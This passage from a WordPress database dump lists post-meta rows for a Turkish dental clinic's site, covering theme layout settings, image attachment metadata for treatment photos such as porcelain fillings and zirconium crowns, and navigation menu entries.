ds\";a:0:{}}}'),
(3541, 6322, '_thumbnail_id', '6323'),
(3542, 6322, 'slide_template', 'default'),
(3543, 6322, '_wpb_vc_js_status', 'true'),
(3544, 6322, 'us_header', ''),
(3545, 6322, 'us_header_id', ''),
(3546, 6322, 'us_header_sticky_override', '0'),
(3547, 6322, 'us_header_transparent_override', '0'),
(3548, 6322, 'us_header_shadow', '0'),
(3549, 6322, 'us_header_sticky_pos', ''),
(3550, 6322, 'us_titlebar', ''),
(3551, 6322, 'us_titlebar_subtitle', ''),
(3552, 6322, 'us_titlebar_size', ''),
(3553, 6322, 'us_titlebar_color', ''),
(3554, 6322, 'us_titlebar_breadcrumbs', ''),
(3555, 6322, 'us_titlebar_image', ''),
(3556, 6322, 'us_titlebar_bg_size', ''),
(3557, 6322, 'us_titlebar_bg_repeat', ''),
(3558, 6322, 'us_titlebar_bg_position', ''),
(3559, 6322, 'us_titlebar_bg_parallax', ''),
(3560, 6322, 'us_titlebar_overlay_color', ''),
(3561, 6322, 'us_sidebar', ''),
(3562, 6322, 'us_sidebar_id', 'default_sidebar'),
(3563, 6322, 'us_sidebar_pos', 'right'),
(3564, 6322, 'us_footer', ''),
(3565, 6322, 'us_footer_id', 'default-footer'),
(3566, 6322, 'us_tile_bg_color', ''),
(3567, 6322, 'us_tile_text_color', ''),
(3568, 6322, 'us_tile_size', '1x1'),
(3569, 6322, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3570, 6322, 'us_tile_additional_image', ''),
(3571, 6329, 'us_og_image', ''),
(3572, 6329, 'us_grid_layout_ids', ''),
(3573, 6329, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3574, 6329, '_edit_last', '1'),
(3575, 6329, '_edit_lock', '1531493775:1'),
(3576, 6330, '_wp_attached_file', '2018/07/adeviz.jpg'),
(3577, 6330, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2018/07/adeviz.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"adeviz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"adeviz-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"adeviz-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"adeviz-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"adeviz-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3578, 6329, '_thumbnail_id', '6330'),
(3579, 6329, 'slide_template', 'default'),
(3580, 6329, '_wpb_vc_js_status', 'true'),
(3581, 6329, 'us_header', ''),
(3582, 6329, 'us_header_id', ''),
(3583, 6329, 'us_header_sticky_override', '0'),
(3584, 6329, 'us_header_transparent_override', '0'),
(3585, 6329, 'us_header_shadow', '0'),
(3586, 6329, 'us_header_sticky_pos', ''),
(3587, 6329, 'us_titlebar', ''),
(3588, 6329, 'us_titlebar_subtitle', ''),
(3589, 6329, 'us_titlebar_size', ''),
(3590, 6329, 'us_titlebar_color', ''),
(3591, 6329, 'us_titlebar_breadcrumbs', ''),
(3592, 6329, 'us_titlebar_image', ''),
(3593, 6329, 'us_titlebar_bg_size', ''),
(3594, 6329, 'us_titlebar_bg_repeat', ''),
(3595, 6329, 'us_titlebar_bg_position', ''),
(3596, 6329, 'us_titlebar_bg_parallax', ''),
(3597, 6329, 'us_titlebar_overlay_color', ''),
(3598, 6329, 'us_sidebar', ''),
(3599, 6329, 'us_sidebar_id', 'default_sidebar'),
(3600, 6329, 'us_sidebar_pos', 'right'),
(3601, 6329, 'us_footer', ''),
(3602, 6329, 'us_footer_id', 'default-footer'),
(3603, 6329, 'us_tile_bg_color', ''),
(3604, 6329, 'us_tile_text_color', ''),
(3605, 6329, 'us_tile_size', '1x1'),
(3606, 6329, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3607, 6329, 'us_tile_additional_image', ''),
(3608, 6332, 'us_og_image', ''),
(3609, 6332, 'us_grid_layout_ids', ''),
(3610, 6332, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3611, 6332, '_edit_last', '1'),
(3612, 6332, '_edit_lock', '1531494015:1'),
(3613, 6333, '_wp_attached_file', '2018/07/Porselen-Dis-Dolgulari.jpg'),
(3614, 6333, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:750;s:6:\"height\";i:145;s:4:\"file\";s:34:\"2018/07/Porselen-Dis-Dolgulari.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Porselen-Dis-Dolgulari-150x145.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Porselen-Dis-Dolgulari-300x58.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:58;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:34:\"Porselen-Dis-Dolgulari-350x145.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:34:\"Porselen-Dis-Dolgulari-600x145.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:34:\"Porselen-Dis-Dolgulari-600x116.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:34:\"Porselen-Dis-Dolgulari-600x145.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3615, 6334, '_wp_attached_file', '2018/07/porselendolgu.jpg'),
(3616, 6334, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/porselendolgu.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"porselendolgu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"porselendolgu-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"porselendolgu-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"porselendolgu-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"porselendolgu-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3617, 6332, '_thumbnail_id', '6334'),
(3618, 6332, 'slide_template', 'default'),
(3619, 6332, '_wpb_vc_js_status', 'true'),
(3620, 6332, 'us_header', ''),
(3621, 6332, 'us_header_id', ''),
(3622, 6332, 'us_header_sticky_override', '0'),
(3623, 6332, 'us_header_transparent_override', '0'),
(3624, 6332, 'us_header_shadow', '0'),
(3625, 6332, 'us_header_sticky_pos', ''),
(3626, 6332, 'us_titlebar', ''),
(3627, 6332, 'us_titlebar_subtitle', ''),
(3628, 6332, 'us_titlebar_size', ''),
(3629, 6332, 'us_titlebar_color', ''),
(3630, 6332, 'us_titlebar_breadcrumbs', ''),
(3631, 6332, 'us_titlebar_image', ''),
(3632, 6332, 'us_titlebar_bg_size', ''),
(3633, 6332, 'us_titlebar_bg_repeat', ''),
(3634, 6332, 'us_titlebar_bg_position', ''),
(3635, 6332, 'us_titlebar_bg_parallax', ''),
(3636, 6332, 'us_titlebar_overlay_color', ''),
(3637, 6332, 'us_sidebar', ''),
(3638, 6332, 'us_sidebar_id', 'default_sidebar'),
(3639, 6332, 'us_sidebar_pos', 'right'),
(3640, 6332, 'us_footer', ''),
(3641, 6332, 'us_footer_id', 'default-footer'),
(3642, 6332, 'us_tile_bg_color', ''),
(3643, 6332, 'us_tile_text_color', ''),
(3644, 6332, 'us_tile_size', '1x1'),
(3645, 6332, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3646, 6332, 'us_tile_additional_image', ''),
(3647, 6336, 'us_og_image', ''),
(3648, 6336, 'us_grid_layout_ids', ''),
(3649, 6336, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3650, 6336, '_edit_last', '1'),
(3651, 6336, '_edit_lock', '1531494346:1'),
(3652, 6337, '_wp_attached_file', '2018/07/dis-beyazlatma.jpg'),
(3653, 6337, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/07/dis-beyazlatma.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"dis-beyazlatma-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"dis-beyazlatma-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:26:\"dis-beyazlatma-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:26:\"dis-beyazlatma-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:26:\"dis-beyazlatma-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3654, 6338, '_wp_attached_file', '2018/07/Dis-Beyazlatma-Bleaching-Once-Sonra.jpg'),
(3655, 6338, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:369;s:6:\"height\";i:378;s:4:\"file\";s:47:\"2018/07/Dis-Beyazlatma-Bleaching-Once-Sonra.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"Dis-Beyazlatma-Bleaching-Once-Sonra-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Dis-Beyazlatma-Bleaching-Once-Sonra-293x300.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:47:\"Dis-Beyazlatma-Bleaching-Once-Sonra-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3656, 6336, '_thumbnail_id', '6337'),
(3657, 6336, 'slide_template', 'default'),
(3658, 6336, '_wpb_vc_js_status', 'true'),
(3659, 6336, 'us_header', ''),
(3660, 6336, 'us_header_id', ''),
(3661, 6336, 'us_header_sticky_override', '0'),
(3662, 6336, 'us_header_transparent_override', '0'),
(3663, 6336, 'us_header_shadow', '0'),
(3664, 6336, 'us_header_sticky_pos', ''),
(3665, 6336, 'us_titlebar', ''),
(3666, 6336, 'us_titlebar_subtitle', ''),
(3667, 6336, 'us_titlebar_size', ''),
(3668, 6336, 'us_titlebar_color', ''),
(3669, 6336, 'us_titlebar_breadcrumbs', ''),
(3670, 6336, 'us_titlebar_image', ''),
(3671, 6336, 'us_titlebar_bg_size', ''),
(3672, 6336, 'us_titlebar_bg_repeat', ''),
(3673, 6336, 'us_titlebar_bg_position', ''),
(3674, 6336, 'us_titlebar_bg_parallax', ''),
(3675, 6336, 'us_titlebar_overlay_color', ''),
(3676, 6336, 'us_sidebar', ''),
(3677, 6336, 'us_sidebar_id', 'default_sidebar'),
(3678, 6336, 'us_sidebar_pos', 'right'),
(3679, 6336, 'us_footer', ''),
(3680, 6336, 'us_footer_id', 'default-footer'),
(3681, 6336, 'us_tile_bg_color', ''),
(3682, 6336, 'us_tile_text_color', ''),
(3683, 6336, 'us_tile_size', '1x1'),
(3684, 6336, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3685, 6336, 'us_tile_additional_image', ''),
(3686, 6340, 'us_og_image', ''),
(3687, 6340, 'us_grid_layout_ids', ''),
(3688, 6340, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3689, 6340, '_edit_last', '1'),
(3690, 6340, '_edit_lock', '1531494619:1'),
(3691, 6341, '_wp_attached_file', '2018/07/lamine-kaplama.jpg'),
(3692, 6341, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/07/lamine-kaplama.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"lamine-kaplama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"lamine-kaplama-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:26:\"lamine-kaplama-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:26:\"lamine-kaplama-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:26:\"lamine-kaplama-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3693, 6340, '_thumbnail_id', '6341'),
(3694, 6340, 'slide_template', 'default'),
(3695, 6340, '_wpb_vc_js_status', 'true'),
(3696, 6340, 'us_header', ''),
(3697, 6340, 'us_header_id', ''),
(3698, 6340, 'us_header_sticky_override', '0'),
(3699, 6340, 'us_header_transparent_override', '0'),
(3700, 6340, 'us_header_shadow', '0'),
(3701, 6340, 'us_header_sticky_pos', ''),
(3702, 6340, 'us_titlebar', ''),
(3703, 6340, 'us_titlebar_subtitle', ''),
(3704, 6340, 'us_titlebar_size', ''),
(3705, 6340, 'us_titlebar_color', ''),
(3706, 6340, 'us_titlebar_breadcrumbs', ''),
(3707, 6340, 'us_titlebar_image', ''),
(3708, 6340, 'us_titlebar_bg_size', ''),
(3709, 6340, 'us_titlebar_bg_repeat', ''),
(3710, 6340, 'us_titlebar_bg_position', ''),
(3711, 6340, 'us_titlebar_bg_parallax', ''),
(3712, 6340, 'us_titlebar_overlay_color', ''),
(3713, 6340, 'us_sidebar', ''),
(3714, 6340, 'us_sidebar_id', 'default_sidebar'),
(3715, 6340, 'us_sidebar_pos', 'right'),
(3716, 6340, 'us_footer', ''),
(3717, 6340, 'us_footer_id', 'default-footer'),
(3718, 6340, 'us_tile_bg_color', ''),
(3719, 6340, 'us_tile_text_color', ''),
(3720, 6340, 'us_tile_size', '1x1'),
(3721, 6340, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3722, 6340, 'us_tile_additional_image', ''),
(3723, 6343, 'us_og_image', ''),
(3724, 6343, 'us_grid_layout_ids', ''),
(3725, 6343, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3726, 6344, '_wp_attached_file', '2018/07/zirkonyum-kaplama.jpg'),
(3727, 6344, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/07/zirkonyum-kaplama.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"zirkonyum-kaplama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"zirkonyum-kaplama-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:29:\"zirkonyum-kaplama-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:29:\"zirkonyum-kaplama-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:29:\"zirkonyum-kaplama-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3728, 6343, '_edit_last', '1'),
(3729, 6343, '_edit_lock', '1531494954:1'),
(3730, 6345, '_wp_attached_file', '2018/07/zirkonyum-kaplama.jpeg'),
(3731, 6345, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:588;s:6:\"height\";i:397;s:4:\"file\";s:30:\"2018/07/zirkonyum-kaplama.jpeg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"zirkonyum-kaplama-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"zirkonyum-kaplama-300x203.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:30:\"zirkonyum-kaplama-350x350.jpeg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3732, 6343, '_thumbnail_id', '6344'),
(3733, 6343, 'slide_template', 'default'),
(3734, 6343, '_wpb_vc_js_status', 'true'),
(3735, 6343, 'us_header', ''),
(3736, 6343, 'us_header_id', ''),
(3737, 6343, 'us_header_sticky_override', '0'),
(3738, 6343, 'us_header_transparent_override', '0'),
(3739, 6343, 'us_header_shadow', '0'),
(3740, 6343, 'us_header_sticky_pos', ''),
(3741, 6343, 'us_titlebar', ''),
(3742, 6343, 'us_titlebar_subtitle', ''),
(3743, 6343, 'us_titlebar_size', ''),
(3744, 6343, 'us_titlebar_color', ''),
(3745, 6343, 'us_titlebar_breadcrumbs', ''),
(3746, 6343, 'us_titlebar_image', ''),
(3747, 6343, 'us_titlebar_bg_size', ''),
(3748, 6343, 'us_titlebar_bg_repeat', ''),
(3749, 6343, 'us_titlebar_bg_position', ''),
(3750, 6343, 'us_titlebar_bg_parallax', ''),
(3751, 6343, 'us_titlebar_overlay_color', ''),
(3752, 6343, 'us_sidebar', ''),
(3753, 6343, 'us_sidebar_id', 'default_sidebar'),
(3754, 6343, 'us_sidebar_pos', 'right'),
(3755, 6343, 'us_footer', ''),
(3756, 6343, 'us_footer_id', 'default-footer'),
(3757, 6343, 'us_tile_bg_color', ''),
(3758, 6343, 'us_tile_text_color', ''),
(3759, 6343, 'us_tile_size', '1x1'),
(3760, 6343, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3761, 6343, 'us_tile_additional_image', ''),
(3762, 6347, 'us_og_image', ''),
(3763, 6347, 'us_grid_layout_ids', ''),
(3764, 6347, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3765, 6347, '_menu_item_type', 'post_type'),
(3766, 6347, '_menu_item_menu_item_parent', '6319'),
(3767, 6347, '_menu_item_object_id', '6343'),
(3768, 6347, '_menu_item_object', 'us_portfolio'),
(3769, 6347, '_menu_item_target', ''),
(3770, 6347, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3771, 6347, '_menu_item_xfn', ''),
(3772, 6347, '_menu_item_url', ''),
(3774, 6348, 'us_og_image', ''),
(3775, 6348, 'us_grid_layout_ids', ''),
(3776, 6348, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3777, 6348, '_menu_item_type', 'post_type'),
(3778, 6348, '_menu_item_menu_item_parent', '6319'),
(3779, 6348, '_menu_item_object_id', '6340'),
(3780, 6348, '_menu_item_object', 'us_portfolio'),
(3781, 6348, '_menu_item_target', ''),
(3782, 6348, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3783, 6348, '_menu_item_xfn', ''),
(3784, 6348, '_menu_item_url', ''),
(3786, 6349, 'us_og_image', ''),
(3787, 6349, 'us_grid_layout_ids', ''),
(3788, 6349, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3789, 6349, '_menu_item_type', 'post_type'),
(3790, 6349, '_menu_item_menu_item_parent', '6319'),
(3791, 6349, '_menu_item_object_id', '6336'),
(3792, 6349, '_menu_item_object', 'us_portfolio'),
(3793, 6349, '_menu_item_target', ''),
(3794, 6349, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3795, 6349, '_menu_item_xfn', ''),
(3796, 6349, '_menu_item_url', ''),
(3798, 6350, 'us_og_image', ''),
(3799, 6350, 'us_grid_layout_ids', ''),
(3800, 6350, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3801, 6350, '_menu_item_type', 'post_type'),
(3802, 6350, '_menu_item_menu_item_parent', '6319'),
(3803, 6350, '_menu_item_object_id', '6332'),
(3804, 6350, '_menu_item_object', 'us_portfolio'),
(3805, 6350, '_menu_item_target', ''),
(3806, 6350, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3807, 6350, '_menu_item_xfn', ''),
(3808, 6350, '_menu_item_url', ''),
(3810, 6351, 'us_og_image', ''),
(3811, 6351, 'us_grid_layout_ids', ''),
(3812, 6351, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3813, 6351, '_menu_item_type', 'post_type'),
(3814, 6351, '_menu_item_menu_item_parent', '6319'),
(3815, 6351, '_menu_item_object_id', '6329'),
(3816, 6351, '_menu_item_object', 'us_portfolio'),
(3817, 6351, '_menu_item_target', ''),
(3818, 6351, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3819, 6351, '_menu_item_xfn', ''),
(3820, 6351, '_menu_item_url', ''),
(3822, 6352, 'us_og_image', ''),
(3823, 6352, 'us_grid_layout_ids', ''),
(3824, 6352, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3825, 6352, '_menu_item_type', 'post_type'),
(3826, 6352, '_menu_item_menu_item_parent', '6319'),
(3827, 6352, '_menu_item_object_id', '6322'),
(3828, 6352, '_menu_item_object', 'us_portfolio'),
(3829, 6352, '_menu_item_target', ''),
(3830, 6352, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3831, 6352, '_menu_item_xfn', ''),
(3832, 6352, '_menu_item_url', ''),
(3834, 6353, 'us_og_image', ''),
(3835, 6353, 'us_grid_layout_ids', ''),
(3836, 6353, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3837, 6353, '_edit_last', '1'),
(3838, 6353, '_edit_lock', '1531935564:1'),
(3839, 6354, '_wp_attached_file', '2018/07/Hareketli-Protez-Tedavisi.jpg'),
(3840, 6354, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:375;s:6:\"height\";i:294;s:4:\"file\";s:37:\"2018/07/Hareketli-Protez-Tedavisi.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Hareketli-Protez-Tedavisi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Hareketli-Protez-Tedavisi-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:37:\"Hareketli-Protez-Tedavisi-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"